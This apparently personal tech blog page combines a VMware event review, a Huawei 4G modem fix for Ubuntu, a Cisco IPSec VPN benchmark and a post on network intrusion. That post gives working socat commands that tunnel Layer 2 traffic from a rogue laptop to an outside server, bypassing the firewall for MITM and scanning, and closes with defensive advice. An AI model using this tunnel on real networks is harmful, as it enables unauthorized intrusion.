Few Words on VMware Evolve 2014

On 28th May 2014 the guys from VMware organised the Evolve 2014 event in Bucharest. Partners like HP, Cisco, Dell and Veeam were also invited to speak about their future options. I’ll write down few ideas about what I saw there:

  • VMware is hot on the flow. They really know what the customers are awaiting from virtualization and I am talking about NSX. However, the release of NSX will seriously hit sales of networking vendors.
  • VMware presentations were A++. All the speakers from VMware presented interesting topics and included technical details to keep the public interested. Unlike what the guys from Cisco Connect were doing last year with their too-much-business approach…
  • partners, partners…or not? The speaker from VMware was joking about HP servers made in China, with the speaker from HP preparing to get to the microphone. Not nice.
  • It was amusing seeing a business woman trying to convince us that everything can and should be virtualized. yeah, sure.
  • Networking vendors are a bit against the trend. Cisco is neglecting OpenFlow and hardly trying to make you buy your full infrastructure from them, including servers. In a moment when most other vendors provide interoperability and open standard solutions it might not be a good idea. Also, the trend of moving advanced functions from switches and routers to the the servers will hit networking companies for sure.

However, when you check VMware’s price list you realize that KVM is still a great solution. I used them both and I still prefer KVM for the transparent Linux-way implementation and the ease of troubleshooting.

 

Network Intrusion using Socat SSL Tunnel

Introduction

This article presents a scenario describing what can happen when an untrusted device is connected to a network. Even if the paper uses a so-called rogue laptop for accessing the network, this device can easily be replaced by a computer running malware software or a virus code.

The scenario is simple: someone requests access to your network for a common reason: he wants to send an e-mail, get his facebook news feed or something similar. If you kindly allow him to connect to your network, you should better connect him directly into an untrusted segment of your infrastructure. Because this new untrusted device can do a lot of bad things!

In this article we will present a simple “bad thing” that can be done with a single line of scripting. An attacker can use a tool like socat to create a SSL tunnel and forward traffic over a TCP connection initiated from within the network. If socat tunnel is bound to a TAP Linux interface, Layer 2 traffic can be forwarded over the TCP connection. This means that an attacker creating the tunnel can bring an outside host right into your local network, completely bypassing your firewall rules. Moreover, the attacker can execute Vulnerability Assessment Software like Nessus to scan your network, identify vulnerabilities and possibly exploit them. If the firewall is not performing SSL inspection in proxy mode, it has absolutely no chance to intercept encrypted forwarded traffic.

 

How to

The picture of the attack is presented bellow:

Attack Topology

Attack Topology

The Server is reachable via Internet and it is running a simple daemonized socat like the following line:

socat TUN:10.0.0.1/24,tun-name=tap0,tun-type=tap,iff-up,iff-broadcast OPENSSL-LISTEN:5544,certificate=server.pem,cafile=ca.crt

The address 10.0.0.1/24 is temporary used. Once the client will connect from the remote laptop, a dhclient request will be performed to get inside the victim’s network.

The client should simply run the following command:

socat OPENSSL:server.bluedrive.ro:5544,cafile=ca.crt TUN:10.0.0.2/24,tun-name=tap1,tun-type=tap,iff-up,iff-broadcast &

Once the client interface is connected, the newly created TAP should be bridged with the remote network. It is possible to create a bridge and than insert the TAP into the bridge (on rogue laptop):

brctl addbr br0

brctl addif br0 tap1

brctl addif br0 eth0

Once this is done, the server can perform a dhcp request, using dhclient (on server):

dhclient tap0

And that is all. With Layer 2 connectivity into a remote network it is possible to perform devastating attacks. I was able to perform MITM using arp poisoning, for example. Another attack is to use a vulnerability assessment tool like Nessus to discover the computers from the remote network. Nmap discovery can be successfully performed also.

From the network admin’s point of view, it is important to remark that it is a big chance that such attacks will go unnoticed. The firewall won’t detect what’s inside the SSL tunnel if it is not using proxy inspection. Even if it can intercept the SSL traffic, security devices might not correctly interpret the Ethernet over TCP traffic.

Conclusions

Network administrators should carefully plan how new computers access the network. They should also consider that even trusted computers can perform malicious tasks and implement intrusion detection mechanisms and advanced packet inspection. Also, make sure that your firewall can intercept and inspect SSL traffic (no matter what destination port is used).

 

 

Article dedicated to S. T. To my S. T. <3.

Ubuntu 12.04 support for Huawei E392

One of the best 4G/LTE modem available on the market doesn’t work with Ubuntu 12.04, given the default settings, even if it is supported by the kernel supplied. The problem resides in the usb_modeswitch tool, which misses the configuration for switching the device from the USB storage device mode to 4G modem.

The problem

USB modem sticks act like storage devices once connected to a computer. This is the default behaviour because you usually plug the modem in your Windows machine and install an application provided by your data carrier. This application is responsible for switching modem from storage device to 4G/3G modem mode. However, most of the time, the carrier supplies only a Windows version of their app and you will have to deal on your own with the problems that arise from connecting the device to a Linux-powered computer.

But Ubuntu and other distros are prepared for this(unlike the default drivers from Windows systems). There is an application called usb_modeswitch which detects the modem and switches the mode from usb storage device to data modem. This is done by writing a specific set of bytes on the USB data bus. Once this is done, you will get one or two /dev/ttyUSBX entries in /dev folder and the Broadband Connections widgets will handle the PPP connection (with minimal settings supplied by the user).

Solution for Huawei E392

I recently got a new unlocked Huawei E392u-12 and I wanted to connect my laptop to the internet using it. However, once I plugged it into the USB port, all I could do was to browse the contents of the stick.

After some google research, I understood that the device is not automatically switched to USB 4G modem mode. I had to use the usb_modeswitch tool to switch it manually (as root).

usb_modeswitch -v 12d1 -p 151a -V 12d1 -P 151b -W -M “55534243123456780000000000000011062000000100000000000000000000″

The -V and -P options can be omitted if you are trying to switch another modem from Huawei. The message content should work for most Huawei sticks.

Once this is done, you should see a device with 12d1:151b vendor/device IDs in the output of lsusb.

After that, just use the Network Manager and setup your Broadband Connection.

The system should perform everything automatically, once the USB stick is plugged in. Create the /etc/usb_modeswitch.d/12d1\:151a file with the following content:

usb_modeswitch config

usb_modeswitch configuration for Huawei E392

If you need to copy paste it:

# Huawei E392u-12

TargetVendor=  0x12d1
TargetProduct= 0x151b

MessageContent=”55534243123456780000000000000011062000000100000000000000000000″

You should also edit the /lib/udev/rules.d/40-usb_modeswitch.rules file and add the following content after LABEL=”modeswitch_rules_begin” line:

# Huawei E392u-12
ATTRS{idVendor}==”12d1″, ATTRS{idProduct}==”151a”, RUN+=”usb_modeswitch ‘%b/%k’”

udev rule

Udev Rule

From this point on, your modem should be automatically recognized as a 4G Modem once you plug it in the USB port.

Note that the solution presented here can be adapted for other Huawei modems also. Just test switching using the usb_modeswitch tool. Also report new results to http://www.draisberghof.de/usb_modeswitch/ .

 

Site to Site VPN with Cisco 3825 & Cisco 2821 Routers

I recently got two Cisco routers from Germany and I wanted to perform some tests and check the performance of the devices. One of the first things that I spotted on the output of “show version” was the fact that both devices had an integrated VPN module, thus providing hardware encryption acceleration. With that in mind, I wanted to implement a Site-to-Site IPSec-based VPN and evaluate the solution.

Cisco 3825 & 2821 Routers

Cisco 3825 & 2821 Routers

Scenario

Company X has two offices connected to the Internet. However, they don’t want to invest in a dedicated link to interconnect the sites and they prefer to use the existing Internet connections to create a secure tunnel. The tunnel will connect the two sites and the employees would be able to access computers from the other site(s) the same way they access their local servers. Thus file sharing, collaborative working and cooperation between the sites will be simpler than ever, but more important, the link between the two sites would be encrypted for privacy.

Solution

Considering that you already have two sites with two internet connections, there is not much change to do. Use two routers capable to create and work with IPSec tunnels and you are good to go. However, this document uses two Cisco routers and Virtual Tunnel Interfaces for the IPSec tunnel link. Why use the VTI approach, compared to the standard crypto-map applied on an interface? The advantages are listed bellow:

  • easier management – for example, to select the traffic that should pass through the tunnel, just route it through that interface
  • scalability – less Security Associations should be used for the traffic passing through the tunnel
  • dynamic routing – as the VTI is a Layer 3 routable interface, it can be used with dynamic routing protocols
  • can use loopbacks for tunnel source/destination, thus improving the availability if sites use redundant Internet Connections
  • better performances (check tests bellow)

 

Hardware

As already mentioned, I used two Cisco routers for my setup. The more important office (the one that should support more VPN tunnels) should use the Cisco 3825 router.

The main characteristics are:

2 Gigabit Ethernet (1000 Mbps) interfaces

2 Fast Ethernet (100 Mbps) interfaces

512 MB RAM

VPN card

Show version output:

Master#show version
Cisco IOS Software, 3800 Software (C3825-ADVENTERPRISEK9-M), Version 12.4(12), RELEASE SOFTW)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Fri 17-Nov-06 15:31 by prod_rel_team

ROM: System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1)

Master uptime is 1 hour, 16 minutes
System returned to ROM by power-on
System image file is “flash:c3825-adventerprisek9-mz.124-12.bin”

Cisco 3825 (revision 1.2) with 485376K/38912K bytes of memory.

Processor board ID FHK1132F066
2 FastEthernet interfaces
2 Gigabit Ethernet interfaces
1 Virtual Private Network (VPN) Module
DRAM configuration is 64 bits wide with parity enabled.
479K bytes of NVRAM.
62720K bytes of ATA System CompactFlash (Read/Write)

Configuration register is 0×2102

Considering Cisco’s Datasheet, the 3825 should provide around 170 Mbps IPSec Throughput (3DES/AES encryption).

The other router used was a Cisco 2821, less powerful than the 3825, but just perfect for routing packets to internet for a small office. The specs are:

2 Gigabit Ethernet(1000 Mbps) interfaces

512MB RAM

VPN card

Show version output:

Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 12.4(12), RELEASE SOF)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Fri 17-Nov-06 12:02 by prod_rel_team

ROM: System Bootstrap, Version 12.4(13r)T11, RELEASE SOFTWARE (fc1)

Slave uptime is 1 hour, 18 minutes
System returned to ROM by power-on
System image file is “flash:c2800nm-adventerprisek9-mz.124-12.bin”

….

Cisco 2821 (revision 53.50) with 509952K/14336K bytes of memory.
Processor board ID FCZ1409708Y
2 Gigabit Ethernet interfaces
1 Virtual Private Network (VPN) Module
DRAM configuration is 64 bits wide with parity enabled.
239K bytes of non-volatile configuration memory.
126000K bytes of ATA CompactFlash (Read/Write)

Configuration register is 0×2102

According to the Datasheet, the 2821 should be able to route 56 Mbps of IPSec traffic.

For traffic tests I used one server with Gigabit LAN card and one Laptop with Gigabit link also.

 

Setup and configuration

The topology of the network is presented bellow:

Network Topology

Network Topology

 

The two sites considered use private IP addressing and have one internet connection with a public IP address assigned on Gigabit0/1 interfaces. This is a standard setup for many companies, that do not use public IP addressing inside their company. However, note that the security benefits of the IPSec tunnel are still valid for this case also.

 

When using VTI, a tunnel interface is created. Each end of the tunnel uses an IP address and after the configuration is performed, it should be possible to ping from one router the remote end of the tunnel for testing purposes. Another important details is how to choose the source and the destination address of the tunnel: the source should be the local public IP address, while the destination should be the remote public IP address. Simple like that. In fact, those IP addresses would be assigned to the encrypted packets while travelling through the Internet.

 

Results

The first thing I did was to test the bandwidth between the server and the client with iperf, without enabling the site to site vpn, so without any tunnel between the networks.

Standard Routing, no IPSec

Standard Routing, no IPSec

 

The results of the test were really better than I was expecting (the 2821 performed really well). A bandwidth of over 875 Mbps would provide very good Internet access and with such high values, I think that both routers could be used for almost wire-speed routing in enterprise networks.

With site to site VPN enabled the throughput is higher that the Internet Bandwidth that many small and medium companies use. 46.8 Mbps IPSec traffic is not an amazing value (in fact it is lower than the one from 2821′s datasheet), but it is more than enough for most business applications.

 

IPSec Tunnel Results

IPSec Tunnel Results

I wanted to see if using crypto maps provided improved performance, but the results show that implementing VTIs is the best option.

IPSec using Crypto Maps

IPSec using Crypto Maps

It doesn’t make sense to waste almost 3 Mpbs of encrypted throughput, so stick to VTI’s with all the other advantages presented.

Another test was to download a 4GB ISO from the Web Server hosted on the Server machine to the Client, using wget.

HTTP over IPSec (3des encryption)

HTTP over IPSec (3des encryption)

The Goodput traffic represents about 42.5 Mbps.

Note that the performance does not change, even if the encryption algorithm is changed to AES or simple DES.

 

HTTP over IPSec (des encryption)

HTTP over IPSec (des encryption)

I was also curious about the pure routing throughput of both routers, so I wanted to check the bandwidth to from both 10.1.0.0/24 and 10.2.0.0/24 networks to 88.0.0.0/24 network. I moved the server in the “public” subnet and used iperf again.

 

Cisco 3825 routing throughput

Cisco 3825 routing throughput

Cisco 2821 routing throughput

Cisco 2821 routing throughput

Both routers can push over 900 Mbps between the two Gigabit interfaces available, which is quite impressive for an access layer routers. Add the over 45Mbps IPSec throughput and I can consider them a good deal.

 

Conclusions

With a throughput of over 45 Mbps of IPSec data, I consider solution presented flexible, efficient and cost-effective for a small or medium size company that is interested in connecting two sites. Moreover, the Cisco 3825 router is more than capable to support up to 3 tunnels, so it could be a serious hub for a hub and spoke topology. 45 Mbps of IPSec traffic is quite enough for most medium size companies, especially if the Internet connection for the offices involved offers a bandwidth of less than 100 Mbps. In that case, investing in more expensive equipments would be non-sense. Even if considered access level routers, both Cisco devices presented here can route almost 1 Gbit of traffic, a serious value which can indicate that they are capable to be lively part in Gigabit networks.

 

The service presented here can be offered to customers with full packaging: equipments and support is included. The Cisco routers are available for sale separately or can be part of larger technical solution. For more details regarding services and prices, contact me at alexandru.bujor@bluedrive.ro . Expect really lower costs compared to ordering new equipments, as our devices are refurbished by Esphere Networks and come with a limited warranty.